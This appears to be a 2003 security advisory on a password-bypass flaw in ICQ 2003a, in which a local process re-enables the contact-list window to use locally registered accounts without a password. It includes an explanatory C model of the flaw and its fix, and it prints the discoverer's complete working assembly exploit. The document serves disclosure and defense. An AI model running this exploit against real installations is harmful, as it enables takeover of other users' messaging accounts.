Mirabilis ICQ Password Authentication Bypass Vulnerability

Release date: 2003-07-05
Update date: 2003-07-14

Affected systems:
Mirabilis ICQ 2003 a Build 3800
Mirabilis ICQ 2003 a Build 3799
Mirabilis ICQ 2003 a Build 3777
Description:
BUGTRAQ ID: 8111

Mirabilis ICQ is a popular instant messaging program.

Mirabilis ICQ has a design flaw: a local attacker can use a few Win32 API calls to access and use other users' ICQ accounts.

The EnableWindow API function is used to enable the ICQ Contact List window, which the client keeps disabled while its login dialog is waiting for a password. Once the window is enabled, the ICQ status can be set to online and another user's locally registered account can be accessed and used without any password check.
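
The design point behind this flaw is that a disabled window is a UI state, not an authentication state: any local process can flip it back with EnableWindow, so an action handler that treats "the contact list is enabled" as proof of login has no real gate at all. The following C model is an added example, not ICQ's code and not Win32 code; it stands in for the cross-process EnableWindow call with a plain function and contrasts a handler gated on window state with one gated on a flag that only the login routine sets. The Session type, the function names and the password value are all constructed for the example.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the client's state. Not ICQ's real data structures. */
typedef struct {
    bool window_enabled;   /* UI state: any local process can flip this (cf. EnableWindow) */
    bool authenticated;    /* security state: set only by login() on a correct password */
    const char *password;  /* constructed stored credential for the local account */
} Session;

/* Client start-up: contact list disabled until the login dialog succeeds. */
void session_init(Session *s, const char *password) {
    s->window_enabled = false;
    s->authenticated = false;
    s->password = password;
}

/* The login dialog's success path: records authentication, then enables the UI. */
bool login(Session *s, const char *attempt) {
    if (strcmp(attempt, s->password) != 0)
        return false;
    s->authenticated = true;
    s->window_enabled = true;
    return true;
}

/* Stand-in for another local process calling EnableWindow on the contact list.
 * The model has no IPC; this function is the only "external" input. */
void external_enable_window(Session *s) {
    s->window_enabled = true;
}

/* Vulnerable pattern: the "go online" handler trusts UI enabled state. */
bool set_status_online_vulnerable(const Session *s) {
    return s->window_enabled;
}

/* Hardened pattern: the handler checks the authentication flag instead. */
bool set_status_online_hardened(const Session *s) {
    return s->authenticated;
}

/* Scenario 1: no password entered, window enabled from outside.
 * Returns true when the UI-gated handler accepts and the hardened one refuses. */
bool scenario_shows_bypass(void) {
    Session s;
    session_init(&s, "constructed-password");
    external_enable_window(&s);
    return set_status_online_vulnerable(&s) && !set_status_online_hardened(&s);
}

/* Scenario 2: a wrong password leaves the hardened handler closed,
 * the right one opens it. Returns true when both observations hold. */
bool scenario_login_unlocks(void) {
    Session s;
    session_init(&s, "constructed-password");
    bool still_refused = !login(&s, "wrong") && !set_status_online_hardened(&s);
    bool now_allowed = login(&s, "constructed-password") && set_status_online_hardened(&s);
    return still_refused && now_allowed;
}

int main(void) {
    printf("UI-gated handler bypassed by external enable: %s\n",
           scenario_shows_bypass() ? "yes" : "no");
    printf("Auth-gated handler opens only after login:     %s\n",
           scenario_login_unlocks() ? "yes" : "no");
    return 0;
}
```

The fix direction the model illustrates is the one a code review would ask for: every privileged action (here, setting the status online) must consult state that only the authentication code path can set, and UI enabling must be a consequence of that state, never a substitute for it.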

<* Source: "Caua" Moura Prado (mouraprado@infoguerra.com.br)

   Link: http://marc.theaimsgroup.com/?l=bugtraq&m=105760672128834&w=2
*>

Test method:

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

"Caua" Moura Prado (mouraprado@infoguerra.com.br) provided the following test method:

; -------------------------------------------------------------------------
;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      BOF
; -------------------------------------------------------------------------
;
;  07/02/2003 - ca1-icq.asm
;  ICQ Password Bypass exploit.
;  written by Cauã Moura Prado (aka ca1)
;  mouraprado@infoguerra.com.br - ICQ 373313
;
;  This exploit allows you to login to ICQ server using any account registered *locally*
;  no matter the 'save password' option is checked or not. High level security is also bypassed.
;  All you have to do is run the exploit and set status property using your mouse when the flower
;  is yellow. If you accidentally set status to offline then you will need to restart ICQ and run
;  the exploit again. Greets to: Alex Demchenko(aka Coban), my cousin Rhenan for testing the exploit
;  on his machine and that tiny Israeli company for starting the whole thing. Oh sure.. hehehe
;  I can't forget...  many kisses to those 3 chicks from my building for being so hot!! ;)
;
;
;        uh-oh!
;         ___
;      __/   \__
;     /  \___/  \        Vulnerable:
;     \__/+ +\__/          ICQ Pro 2003a Build #3800
;     /   ~~~   \
;     \__/   \__/        Not Vulnerable:
;        \___/             ICQ Lite alpha Build 1211
;                          ICQ 2001b and ICQ 2002a
;    tHe Flaw Power        All other versions were not tested.
;
;                          coded with masm32
;
; _______________________________________________________________________exploit born in .br

.386
.model flat, stdcall
option casemap:none
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
szTextHigh byte 'Password Verification', 0   ; login dialog title with "high" security level
szTextLow byte 'Login to server', 0          ; login dialog title with normal security level
szClassName byte '#32770', 0                 ; standard Windows dialog window class
.data?
hWndLogin dword ?
.code
_entrypoint:
invoke FindWindow, addr szClassName, addr szTextHigh   ; look for the high-security login dialog first
mov hWndLogin, eax
.if hWndLogin == 0
   invoke FindWindow, addr szClassName, addr szTextLow ; fall back to the normal login dialog
   mov hWndLogin, eax
.endif
invoke GetParent, hWndLogin      ; owner of the dialog is the contact list window
invoke EnableWindow, eax, 1      ;Enable ICQ contact list
invoke ShowWindow, hWndLogin, 0  ;get rid of Login screen (don't kill this window)
invoke ExitProcess, 0            ;uhuu.. cya! i gotta sleep!
end _entrypoint

; -------------------------------------------------------------------------
;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      EOF
; -------------------------------------------------------------------------

Recommendations:
Vendor patch:

Mirabilis
---------
The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

http://www.icq.com

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.